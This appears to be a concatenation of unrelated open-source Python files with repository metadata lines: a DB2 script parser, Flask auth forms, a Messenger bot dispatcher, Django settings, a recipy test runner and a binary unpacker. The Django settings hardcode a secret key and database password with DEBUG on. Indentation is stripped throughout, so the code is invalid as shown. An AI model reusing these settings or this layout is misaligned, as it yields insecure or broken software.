self._expect('TAPE')
self._parse_initialize_tape_command()
elif self._match('INSPECT'):
self._parse_inspect_command()
elif self._match('INSTANCE'):
self._parse_instance_command()
elif self._match('LIST'):
if self._match('ACTIVE'):
self._expect('DATABASES')
self._parse_list_active_databases_command()
elif self._match('ADMIN'):
self._expect_sequence(['NODE', 'DIRECTORY'])
self._parse_list_node_directory_command()
elif self._match('APPLICATIONS'):
self._parse_list_applications_command()
elif self._match('COMMAND'):
self._expect('OPTIONS')
self._parse_list_command_options_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('DIRECTORY'):
self._parse_list_db_directory_command()
elif self._match('PARTITION'):
self._expect('GROUPS')
self._parse_list_database_partition_groups_command()
else:
self._expected_one_of(['DIRECTORY', 'PARTITION'])
elif self._match_one_of(['DBPARTITIONNUMS', 'NODES']):
self._parse_list_nodes_command()
elif self._match('DCS'):
if self._match('APPLICATIONS'):
self._parse_list_dcs_applications_command()
elif self._match('DIRECTORY'):
self._parse_list_dcs_directory_command()
else:
self._expected_one_of(['APPLICATIONS', 'DIRECTORY'])
elif self._match('DRDA'):
self._expect_sequence(['INDOUBT', 'TRANSACTIONS'])
self._parse_list_drda_indoubt_transactions_command()
elif self._match('HISTORY'):
self._parse_list_history_command()
elif self._match('INDOUBT'):
self._expect('TRANSACTIONS')
self._parse_list_indoubt_transactions_command()
elif self._match('NODE'):
self._expect('DIRECTORY')
self._parse_list_node_directory_command()
elif self._match_one_of(['USER', 'SYSTEM']):
self._expect_sequence(['ODBC', 'DATA', 'SOURCES'])
self._parse_list_odbc_data_sources_command()
elif self._match('ODBC'):
self._expect_sequence(['DATA', 'SOURCES'])
self._parse_list_odbc_data_sources_command()
elif self._match_one_of(['PACKAGES', 'TABLES']):
self._parse_list_tables_command(self)
elif self._match('TABLESPACES'):
if self._match('CONTAINERS'):
self._parse_list_tablespace_containers_command()
else:
self._parse_list_tablespaces_command()
elif self._match('UTILITIES'):
self._parse_list_utilities_command()
else:
self._expected_one_of([
'ACTIVE',
'ADMIN',
'APPLICATIONS',
'COMMAND',
'DATABASE',
'DB',
'DBPARTITIONNUMS',
'DCS',
'DRDA',
'HISTORY',
'INDOUBT',
'NODE',
'NODES',
'ODBC',
'PACKAGES',
'SYSTEM',
'TABLES',
'TABLESPACES',
'USER',
'UTILITIES',
])
elif self._match('LOAD'):
if self._match('QUERY'):
self._parse_load_query_command()
else:
self._parse_load_command()
elif self._match('MIGRATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_migrate_db_command()
elif self._match('ON'):
self._parse_on_command()
elif self._match('PING'):
self._parse_ping_command()
elif self._match_one_of(['PRECOMPILE', 'PREP']):
self._parse_precompile_command()
elif self._match('PRUNE'):
if self._match('HISTORY'):
self._parse_prune_history_command()
elif self._match('LOGFILE'):
self._parse_prune_logfile_command()
else:
self._expected_one_of(['HISTORY', 'LOGFILE'])
elif self._match('PUT'):
self._expect('ROUTINE')
self._parse_put_routine_command()
elif self._match('QUERY'):
self._expect('CLIENT')
self._parse_query_client_command()
elif self._match('QUIESCE'):
if self._match('TABLESPACES'):
self._parse_quiesce_tablespaces_command()
else:
self._parse_quiesce_command()
elif self._match('QUIT'):
self._parse_quit_command()
elif self._match('REBIND'):
self._parse_rebind_command()
elif self._match('RECOVER'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_recover_db_command()
elif self._match('REDISTRIBUTE'):
self._expect_sequence(['DATABASE', 'PARTITION', 'GROUP'])
self._parse_redistribute_database_partition_group_command()
elif self._match('REFRESH'):
if self._match('LDAP'):
self._parse_refresh_ldap_command()
else:
raise ParseBacktrack()
elif self._match('REGISTER'):
if self._match('XMLSCHEMA'):
self._parse_register_xmlschema_command()
elif self._match('XSROBJECT'):
self._parse_register_xsrobject_command()
else:
self._parse_register_command()
elif self._match('REORG'):
self._parse_reorg_command()
elif self._match('REORGCHK'):
self._parse_reorgchk_command()
elif self._match('RESET'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_alert_cfg_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('MANAGER'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_dbm_cfg_command()
else:
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_db_cfg_command()
elif self._match('DBM'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_dbm_cfg_command()
elif self._match('MONITOR'):
self._parse_reset_monitor_command()
else:
self._expected_one_of([
'ADMIN',
'ALERT',
'DATABASE',
'DB',
'DBM',
'MONITOR',
])
elif self._match('RESTART'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_restart_db_command()
elif self._match('RESTORE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_restore_db_command()
elif self._match('REWIND'):
self._expect('TAPE')
self._parse_rewind_tape_command()
elif self._match('ROLLFORWARD'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_rollforward_db_command()
elif self._match('RUNSTATS'):
self._parse_runstats_command()
elif self._match('SET'):
if self._match('CLIENT'):
self._parse_set_client_command()
elif self._match('RUNTIME'):
self._expect('DEGREE')
self._parse_set_runtime_degree_command()
elif self._match('SERVEROUTPUT'):
self._parse_set_serveroutput_command()
elif self._match('TABLESPACE'):
self._expect('CONTAINERS')
self._parse_set_tablespace_containers_command()
elif self._match('TAPE'):
self._expect('POSITION')
self._parse_set_tape_position_command()
elif self._match('UTIL_IMPACT_PRIORITY'):
self._parse_set_util_impact_priority_command()
elif self._match('WORKLOAD'):
self._parse_set_workload_command()
elif self._match('WRITE'):
self._parse_set_write_command()
else:
raise ParseBacktrack()
elif self._match('START'):
if self._match('HADR'):
self._parse_start_hadr_command()
elif self._match_one_of(['DATABASE', 'DB']):
self._expect('MANAGER')
self._parse_start_dbm_command()
elif self._match('DBM'):
self._parse_start_dbm_command()
else:
self._expected_one_of(['HADR', 'DATABASE', 'DB', 'DBM'])
elif self._match('STOP'):
if self._match('HADR'):
self._parse_stop_hadr_command()
elif self._match_one_of(['DATABASE', 'DB']):
self._expect('MANAGER')
self._parse_stop_dbm_command()
elif self._match('DBM'):
self._parse_stop_dbm_command()
else:
self._expected_one_of(['HADR', 'DATABASE', 'DB', 'DBM'])
elif self._match('TAKEOVER'):
self._parse_takeover_hadr_command()
elif self._match('TERMINATE'):
self._parse_terminate_command()
elif self._match('UNCATALOG'):
self._parse_uncatalog_command()
elif self._match('UNQUIESCE'):
self._parse_unquiesce_command()
elif self._match('UPDATE'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_alert_cfg_command()
elif self._match_sequence(['ALTERNATE', 'SERVER']):
self._parse_update_alternate_server_command()
elif self._match('CLI'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_cli_cfg_command()
elif self._match_sequence(['COMMAND', 'OPTIONS']):
self._parse_update_command_options_command()
elif self._match('CONTACT'):
self._parse_update_contact_command()
elif self._match('CONTACTGROUP'):
self._parse_update_contactgroup_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('MANAGER'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_dbm_cfg_command()
else:
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_db_cfg_command()
elif self._match('DBM'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_dbm_cfg_command()
elif (
self._match_sequence(['HEALTH', 'NOTIFICATION', 'CONTACT', 'LIST'])
or self._match_sequence(['NOTIFICATION', 'LIST'])
):
self._parse_update_notification_list_command()
elif self._match('HISTORY'):
self._parse_update_history_command()
elif self._match_sequence(['LDAP', 'NODE']):
self._parse_update_ldap_node_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_update_monitor_switches_command()
elif self._match('XMLSCHEMA'):
self._parse_update_xmlschema_command()
else:
raise ParseBacktrack()
elif self._match('UPGRADE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_upgrade_db_command()
else:
raise ParseBacktrack()
except ParseBacktrack:
self._restore_state()
self._parse_statement()
else:
self._forget_state()
def _parse_top(self):
# Override _parse_top to make a CLP command the top of the parse tree
self._parse_command()
def _parse_init(self, tokens):
# Override _parse_init to set up the output lists (produces, consumes,
# etc.)
super(DB2ZOSScriptParser, self)._parse_init(tokens)
self.produces = []
self.consumes = []
self.connections = []
self.current_connection = None
self.current_user = None
def _save_state(self):
# Override _save_state to save the state of the output lists (produces,
# consumes, etc.)
self._states.append((
self._index,
self._level,
len(self._output),
self.current_schema,
self.current_user,
self.current_connection,
len(self.produces),
len(self.consumes),
len(self.connections),
))
def _restore_state(self):
# Override _restore_state to restore the state of the output lists
# (produces, consumes, etc.)
(
self._index,
self._level,
output_len,
self.current_schema,
self.current_user,
self.current_connection,
produces_len,
consumes_len,
logins_len,
) = self._states.pop()
del self.produces[produces_len:]
del self.consumes[consumes_len:]
del self.connections[logins_len:]
del self._output[output_len:]
| gpl-3.0 | 2,388,590,240,867,676,700 | 39.435933 | 143 | 0.47767 | false |
jp-security/LeagueStats | app/auth/forms.py | 1 | 1957 | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, ValidationError, SelectField, IntegerField, DecimalField
from wtforms.validators import Required, Email, Length, Regexp, EqualTo, NumberRange
from wtforms import ValidationError
from ..models import User
class LoginForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
password = PasswordField('Password', validators=[Required()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log In')
class RegistrationForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
username = StringField('Username', validators=[Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
'Usernames must have only letters, '
'numbers, dots or underscores')])
password = PasswordField('Password', validators=[Required(), EqualTo('password2', message='Password must match.')])
password2 = PasswordField('Confirm password', validators=[Required()])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
raise ValidationError('Usernmae already in use.')
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('Old Password', validators=[Required()])
password = PasswordField('New Password', validators=[Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm new password', validators=[Required()])
submit = SubmitField('Updated Password')
| gpl-3.0 | -6,136,674,587,046,894,000 | 56.558824 | 131 | 0.662749 | false |
Feduch/pyMessengerBotApi | messengerbot/api/messenger_requests/__init__.py | 1 | 2060 | from messengerbot.api.messenger_requests.messenger_start_request import MessengerStartRequest
from messengerbot.api.messenger_requests.messenger_postback_request import MessengerPostbackRequest
from messengerbot.api.messenger_requests.messenger_referral_request import MessengerReferralRequest
from messengerbot.api.messenger_requests.messenger_quick_reply_request import MessengerQuickReplyRequest
from messengerbot.api.messenger_requests.messenger_text_request import MessengerTextRequest
from messengerbot.api.messenger_requests.messenger_file_request import MessengerFileRequest
from messengerbot.api.messenger_requests.messenger_location_request import MessengerLocationRequest
def create_request(request_dict):
for event in request_dict['entry']:
if event.get('messaging'):
messaging = event['messaging']
for data in messaging:
if data.get('postback'):
if data['postback'].get('referral'):
return MessengerStartRequest().from_dict(data)
else:
return MessengerPostbackRequest().from_dict(data)
if data.get('referral'):
return MessengerReferralRequest().from_dict(data)
if data.get('message'):
if data['message'].get('quick_reply'):
return MessengerQuickReplyRequest().from_dict(data)
elif data['message'].get('attachments'):
attachments = data['message'].get('attachments')
for attachment in attachments:
if attachment['type']=='location':
# Данные о своем местонахождении
return MessengerLocationRequest().from_dict(data)
else:
return MessengerFileRequest().from_dict(data)
else:
return MessengerTextRequest().from_dict(data) | gpl-3.0 | 6,069,836,483,418,778,000 | 58.823529 | 104 | 0.622233 | false |
hilarry/cmdb | cmdb/settings.py | 1 | 2308 | """
Django settings for cmdb project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*f)1h7v-ed7bajus^ykj0fe5n*#ld57m@4ca=a3!%v%3@o_7p#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
#'bootstrap_admin',
#'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'device_manage',
'idcroom_manage',
'operation',
#'bootstrap3',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'cmdb.urls'
WSGI_APPLICATION = 'cmdb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cmdb',
'USER': 'cmdb',
'PASSWORD': 'cmdb',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
try:
from local_settings import *
except ImportError:
pass
| apache-2.0 | 5,920,079,684,958,420,000 | 22.313131 | 71 | 0.69974 | false |
recipy/recipy | integration_test/test_packages.py | 1 | 18672 | """
recipy test case runner.
Run tests to check that recipy logs information on input and output
functions invoked by scripts which use packages that recipy has been
configured to log.
Tests are specified using a [YAML](http://yaml.org/) (YAML Ain't
Markup Language) configuration file. YAML syntax is:
* `---` indicates the start of a document.
* `:` denotes a dictionary. `:` must be followed by a space.
* `-` denotes a list.
The test configuration file has format:
---
script: SCRIPT
[standalone: True|False]
libraries: [LIBRARY, LIBRARY, ... ]
test_cases:
- libraries: [LIBRARY, LIBRARY, ... ]
arguments: [..., ..., ...]
inputs: [INPUT, INPUT, ...]
outputs: [OUTPUT, OUTPUT, ...]
- libraries: [LIBRARY, LIBRARY, ... ]
arguments: [..., ..., ...]
inputs: [INPUT, INPUT, ...]
outputs: [OUTPUT, OUTPUT, ...]
[ skip: "Known issue with recipy" ]
[ skip_py_version: [3.4, ...] ]
- ...
---
script: SCRIPT
...
where each script to be tested is defined by:
* 'SCRIPT': script, with a relative or absolute path. For recipy
sample scripts, the script is assumed in a sub-directory
"integration_test/packages".
* 'standalone': is the script a standalone script? If "False", or if
omitted, then the script is assumed to be a recipy sample script,
runnable via the command 'python -m
integration_test.packages.<script>'.
* 'libraries': A list of zero or more libraries used by the script,
which are expected to be logged by recipy when the script is
run regardless of arguments (i.e. any libraries common to all test
cases). If none, then this can be omitted.
* One or more test cases, each of which defines:
- 'libraries': A list of zero or more libraries used by the script,
which are expected to be logged by recipy when the script is
run with the given arguments. If none, then this can be
omitted.
- 'arguments': A list of arguments to be passed to the script. If
none, then this can be omitted.
- 'inputs': A list of zero or more input files which the script will
read, and which are expected to be logged by recipy when running
the script with the arguments. If none, then this can be omitted.
- 'outputs': A list of zero or more output files which the script
will write, and which are expected to be logged by recipy when
running the script with the arguments. If none, then this can be
omitted.
- 'skip': An optional value. If present this test case is marked as
skipped. The value is the reason for skipping the test case.
- 'skip_py_version': An optional value. If present this test case is marked
as skipped if the current Python version is in the list of values. Should
be used when a patched library does not support a Python version that is
supported by recipy.
For example:
---
script: run_numpy.py
libraries: [numpy]
test_cases:
- arguments: [loadtxt]
inputs: [input.csv]
- arguments: [savetxt]
outputs: [output.csv]
- arguments: [load_and_save_txt]
inputs: [input.csv]
outputs: [output.csv]
---
script: "/home/users/user/run_my_script.py"
standalone: True
test_cases:
- arguments: [ ]
libraries: [ numpy ]
outputs: [ data.csv ]
It is up to the developer to ensure the 'libraries', 'input' and
'output' lists correctly record the libraries, input and output files
that it is expected recipy will log when the script is run with the
given arguments.
The test configuration file is provided via an environment variable,
'RECIPY_TEST_CONFIG'. If undefined, then a default of
'integration_test/config/test_packages.yml' is assumed.
"""
import os
import os.path
import sys
import pytest
from integration_test.database import DatabaseError
from integration_test import environment
from integration_test.file_utils import load_yaml
from integration_test import helpers
from integration_test import recipy_environment as recipyenv
SCRIPT = "script"
""" Test case configuration key. """
STANDALONE = "standalone"
""" Test case configuration key. """
TEST_CASES = "test_cases"
""" Test case configuration key. """
LIBRARIES = "libraries"
""" Test case configuration key. """
ARGUMENTS = "arguments"
""" Test case configuration key. """
INPUTS = "inputs"
""" Test case configuration key. """
OUTPUTS = "outputs"
""" Test case configuration key. """
SKIP = "skip"
""" Test case configuration key. """
SKIP_PY_VERSION = "skip_py_version"
""" Test case configuration key. """
TEST_CONFIG_ENV = "RECIPY_TEST_CONFIG"
""" Environment variable for recipy test configuration file name """
DEFAULT_CONFIG = "integration_test/config/test_packages.yml"
""" Default recipy test configuration file name """
DEFAULT_SAMPLES = "integration_test/packages"
""" Default recipy sample scripts directory """
class ConfigError(Exception):
"""Test configuration error."""
def __init__(self, message, exception=None):
"""Create error.
:param message: Message
:type message: str or unicode
:param exception: Exception
:type value: Exception
"""
super(ConfigError, self).__init__()
self._message = message
self._exception = exception
def __str__(self):
"""Get error as a formatted string.
:return: formatted string
:rtype: str or unicode
"""
message = self._message
if self._exception is not None:
message += " : " + str(self._exception)
return repr(message)
@property
def exception(self):
"""Get exception.
:param exception: Exception
:type value: Exception
"""
return self._exception
def get_test_cases():
"""
py.test callback to associate each test script with its test
cases. This function:
* Gets the test configuration file name from the environment
variable 'RECIPY_TEST_CONFIG'. If undefined, then a default of
'integration_test/config/test_packages.yml' is assumed.
* Loads the test configuration file.
* Creates a list of standalone tuples, each representing one
test case, using get_script_test_cases.
py.test parameterized tests generates one test function per
tuple.
:return: test cases
:rtype: list of (str or unicode, str or unicode, dict)
"""
config_file = helpers.get_environment_value(TEST_CONFIG_ENV,
DEFAULT_CONFIG)
configuration = load_yaml(config_file)
return get_script_test_cases(configuration, DEFAULT_SAMPLES)
def get_test_case_function_name(script_test_case):
"""
py.test callback to generate test case function names.
Function names are of form 'script_arguments' where 'script'
and 'arguments' are the 'script_path' conjoined to the test case's
'arguments' with with all forward slashes, backslashes, colons,
semi-colons and spaces replaced by '_'.
:param script_test_case: Script path, command, test case
specification (a tuple from get_script_test_cases).
:type script_test_case: (str or unicode, str or unicode, dict)
:return: Test case function name
:rtype: str or unicode
"""
[script_path, _, test_case] = script_test_case
arguments = [str(argument) for argument in test_case[ARGUMENTS]]
function_name = "_".join(arguments)
function_name = os.path.split(script_path)[1] + "_" + function_name
for char in [" ", "\\", "/", ":", ";", "."]:
function_name = function_name.replace(char, "_")
return function_name
def get_script_test_cases(configurations, recipy_samples_directory):
"""
Creates a list of standalone tuples, each representing one test
case.
This function takes test configurations, a list of dictionaries,
each of which has a 'script', optional 'standalone' flag, optional
'libaries' list and 'test_cases', a list of one or more test cases
(each of which is a dictionary of 'libraries', 'arguments',
'inputs', 'outputs', optional 'skip').
It returns a list of tuples (script path, command, test case) where:
* script_path is the path to the script:
- If the test configuration has a 'standalone' value of "False",
or no such value, then the script is assumed to be a recipy
sample script in "integration_test/packages/".
- Otherwise, the 'script' configuration value is used as-is.
* commmand is the command-line invocation that will be used to run
the script (not including "python" or any arguments, which are
test-case specific):
- If the test configuration has a 'standalone' value of "False",
or no such value, then the command to run the script is
assumed to be "-m integration_test.packages.SCRIPT"
- Otherwise, the 'script' configuration value is used as-is.
* test_case is a single test case configuration, with any common
libraries appended to its 'libraries'.
If any test case contains a 'skip' entry then that test case is marked
up via pytest.mark.skip.
:param configurations: Test configurations
:type dict: list of dict
:param recipy_samples_directory: directory with recipy samples
:type recipy_samples_directory: str or unicode
:return: test cases
:rtype: list of (str or unicode, str or unicode, dict)
"""
test_cases = []
for configuration in configurations:
script = configuration[SCRIPT]
if STANDALONE not in configuration:
# recipy sample test
script_path = os.path.join(recipy_samples_directory, script)
# e.g. integration_test/packages/run_numpy.py
script_module = os.path.splitext(script_path)[0]
# e.g. integration_test/packages/run_numpy
script_module = script_module.replace("/", ".")
script_module = script_module.replace("\\", ".")
# e.g. integration_test.packages.run_numpy
command = ["-m", script_module]
# e.g. -m integration_test.packages.run_numpy
else:
script_path = script
command = [script]
if LIBRARIES in configuration:
common_libraries = configuration[LIBRARIES]
else:
common_libraries = []
for test_case in configuration[TEST_CASES]:
if LIBRARIES in test_case:
test_case[LIBRARIES].extend(common_libraries)
else:
test_case[LIBRARIES] = common_libraries
single_test_case = (script_path, command, test_case)
if SKIP in test_case:
reason = get_test_case_function_name(single_test_case)
reason = reason + ": " + test_case[SKIP]
single_test_case = pytest.mark.skip(
reason=reason)((single_test_case))
if SKIP_PY_VERSION in test_case:
py_version = '{}.{}'.format(sys.version_info.major,
sys.version_info.minor)
to_skip = [str(num) for num in test_case[SKIP_PY_VERSION]]
reason = get_test_case_function_name(single_test_case)
reason = reason + ": unsupported Python version " + py_version
single_test_case = pytest.mark.skipif(
py_version in to_skip,
reason=reason)((single_test_case))
test_cases.append(single_test_case)
return test_cases
def run_test_case(script_path, command, test_case):
"""
Run a single test case. This runs a script using arguments in
test_case and validates that recipy has logged information
about the script, also using data in test_case.
test_case is assumed to have the following
entries:
* 'libraries': a list of one or more libraries e.g. ['numpy'].
* 'arguments': a list of script arguments e.g. ['loadtxt'],
['savetxt']. If none, then this can be omitted.
* 'inputs': a list of zero or more input files which running
the script with the argument will read e.g. ['data.csv']. If
none, then this can be omitted.
* 'outputs': a list of zero or more output files which running
the script with the argument will write
e.g. ['data.csv']. If none, then this can be omitted.
:param script_path: Path to the script.
:type script_path: str or unicode
:param commmand: Command-line invocation used to run the script
(not including "python" or any arguments, which are test-case
specific).
:type command: str or unicode
:param test_case: Test case configuration.
:type test_case: dict
"""
number_of_logs = 0
try:
number_of_logs =\
helpers.get_number_of_logs(recipyenv.get_recipydb())
except DatabaseError:
# Database may not exist if running tests for first time so
# give benefit of doubt at this stage and assume running script
# will bring it into life.
pass
libraries = test_case[LIBRARIES]
if ARGUMENTS in test_case:
arguments = test_case[ARGUMENTS]
else:
arguments = []
# Execute script
_, _ = helpers.execute_python(command + arguments, 0)
# Validate recipy database
log, _ = helpers.get_log(recipyenv.get_recipydb())
# Number of logs
new_number_of_logs =\
helpers.get_number_of_logs(recipyenv.get_recipydb())
assert new_number_of_logs == (number_of_logs + 1),\
("Unexpected number of logs " + new_number_of_logs)
# Script that was invoked
check_script(script_path, log["script"],
arguments, log["command_args"])
# Libraries
check_libraries(libraries, log["libraries"])
# Inputs and outputs (local filenames only)
check_input_outputs(test_case, INPUTS, log["inputs"])
check_input_outputs(test_case, OUTPUTS, log["outputs"])
# Dates
check_dates(log["date"], log["exit_date"])
# Execution environment
check_environment(log["command"], log["environment"])
# Miscellaneous
assert environment.get_user() == log["author"], "Unexpected author"
assert log["description"] == "", "Unexpected description"
def check_script(script, logged_script, arguments, logged_arguments):
"""
Check script and arguments logged by recipy.
:param script: Script specified in test configuration
:type script: str or unicode
:param logged_script: Script logged by recipy
:type logged_script: str or unicode
:param arguments: Arguments specified in test configuration
:type arguments: list
:param logged_arguments: Arguments logged by recipy
:type logged_arguments: list
"""
# Use os.path.abspath as os.path.samefile is not supported in
# Python 2 on Windows.
assert os.path.abspath(script) == os.path.abspath(logged_script),\
"Unexpected script"
assert " ".join(arguments) == logged_arguments, "Unexpected command_args"
def check_libraries(libraries, logged_libraries):
"""
Check libraries logged by recipy.
:param libraries: Libraries specified in test configuration
:type libraries: list of str or unicode
:param logged_libraries: Libraries logged by recipy
:type logged_libraries: list of str or unicode
:raises ConfigError: if any library is not installed
"""
packages = environment.get_packages()
for library in libraries:
if environment.is_package_installed(packages, library):
version = environment.get_package_version(packages, library)
library_version = library + " v" + version
assert library_version in logged_libraries,\
("Could not find library " + library_version)
else:
raise ConfigError(("Library {} is not installed".format(library)))
def check_dates(logged_start_date, logged_end_date):
"""
Check dates logged by recipy.
:param logged_start_date: Start date logged by recipy
:type logged_start_date: str or unicode
:param logged_end_date: End date logged by recipy
:type logged_end_date: str or unicode
"""
try:
start_date = environment.get_tinydatestr_as_date(logged_start_date)
except ValueError as _:
assert False, "date is not a valid date string"
try:
exit_date = environment.get_tinydatestr_as_date(logged_end_date)
except ValueError as _:
assert False, "end_date is not a valid date string"
assert start_date <= exit_date, "date is not before exit_date"
def check_environment(logged_command, logged_environment):
"""
Check environment logged by recipy.
:param logged_command: Python executable logged by recipy
:type logged_command: str or unicode
:param logged_environment: Operating system and Python
version logged by recipy
:type logged_environment: list of str or unicore
"""
assert environment.get_python_exe() == logged_command,\
"Unexpected command"
assert environment.get_os() in logged_environment,\
"Cannot find operating system in environment"
python_version = "python " + environment.get_python_version()
assert python_version in logged_environment,\
"Cannot find Python in environment"
def check_input_outputs(test_case, io_key, logged_io):
"""
Check inputs/outputs logged by recipy.
:param test_case: Test case configuration
:type test_case: dict
:param io_key: "inputs" or "outputs", key into test_case
:type io_key: str or unicode
:param logged_io: Inputs/outputs logged by recipy
:type logged_io: list
"""
if io_key in test_case:
io_files = test_case[io_key]
else:
io_files = []
assert len(io_files) == len(logged_io),\
("Unexpected number of " + io_key)
# Convert logged files to local file names.
logged_files = [os.path.basename(file_name)
for [file_name, _] in logged_io]
for io_file in io_files:
assert io_file in logged_files,\
("Could not find " + io_key + " " + io_file)
@pytest.mark.parametrize("script_test_case",
get_test_cases(),
ids=get_test_case_function_name)
def test_scripts(script_test_case):
"""
Run a test defined in the recipy test configuration.
:param script_test_case: Ncript path, command, test case
specification - consistent with a tuple from
get_script_test_cases.
:type script_test_case: (str or unicode, str or unicode, dict)
"""
(script_path, command, test_case) = script_test_case
run_test_case(script_path, command, test_case)
| apache-2.0 | -3,213,694,212,848,131,600 | 36.121272 | 78 | 0.655848 | false |
decimalbell/devnull | python/sidl/unpacker.py | 1 | 3416 | import struct
class Unpacker(object):
def __init__(self, buf):
self._buffer = buf
self._offset = 0
self._typemethods = {'b': self.unpack_int8, 'B': self.unpack_uint8,
'h': self.unpack_int16, 'H': self.unpack_uint16,
'i': self.unpack_int32, 'I': self.unpack_uint32,
'q': self.unpack_int64, 'Q': self.unpack_uint64,
'f': self.unpack_float, 'd': self.unpack_double,
's': self.unpack_string, 'm': self.unpack_message,
}
@property
def offset(self):
return self._offset
def unpack_integer(self, fmt):
value = struct.unpack_from(fmt, self._buffer, self._offset)
self._offset = self._offset + struct.calcsize(fmt)
return value[0]
def unpack_int8(self):
return self.unpack_integer('<b')
def unpack_int16(self):
return self.unpack_integer('<h')
def unpack_int32(self):
return self.unpack_integer('<l')
def unpack_int64(self):
return self.unpack_integer('<q')
def unpack_uint8(self):
return self.unpack_integer('<B')
def unpack_uint16(self):
return self.unpack_integer('<H')
def unpack_uint32(self):
return self.unpack_integer('<I')
def unpack_uint64(self):
return self.unpack_integer('<Q')
def unpack_float(self):
return float(self.unpack_string())
def unpack_double(self):
return float(self.unpack_string())
def unpack_string(self):
l = self.unpack_uint16()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_binary(self):
l = self.unpack_uint32()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_message(self, msg):
msg.unpack(self)
def unpack_list(self, l):
length = self.unpack_uint32()
if l.typecode in l.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[l.typecode]()
l.append(value)
elif l.typecode == l.typecodes[-1]:
for _ in range(0, length):
msg = l.type()
self._typemethods[l.typecode](msg)
l.append(msg)
def unpack_set(self, s):
length = self.unpack_uint32()
if s.typecode in s.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[s.typecode]()
s.add(value)
elif s.typecode == s.typecodes[-1]:
for _ in range(0, length):
msg = s.type()
self._typemethods[s.typecode](msg)
s.add(msg)
def unpack_dict(self, d):
length = self.unpack_uint32()
for _ in range(0, length):
# key
key = self._typemethods[d.key_typecode]()
# value
if d.value_typecode in d.typecodes[:-1]:
value = self._typemethods[d.value_typecode]()
elif d.value_typecode == d.typecodes[-1]:
value = d.value_type()
self._typemethods[d.value_typecode](value)
d[key] = value
| mit | -6,304,016,966,791,125,000 | 31.226415 | 79 | 0.522248 | false |
kived/kvlang | kvlang/ast_parser.py | 1 | 4502 | from functools import partial
import weakref
from kivy.compat import iteritems
from kivy.factory import Factory
from kivy.lang import ParserRuleProperty, Parser, ParserException, ParserRule as kivy_ParserRule, Builder as kivy_Builder
from kivy.logger import Logger
from kivy.weakproxy import WeakProxy
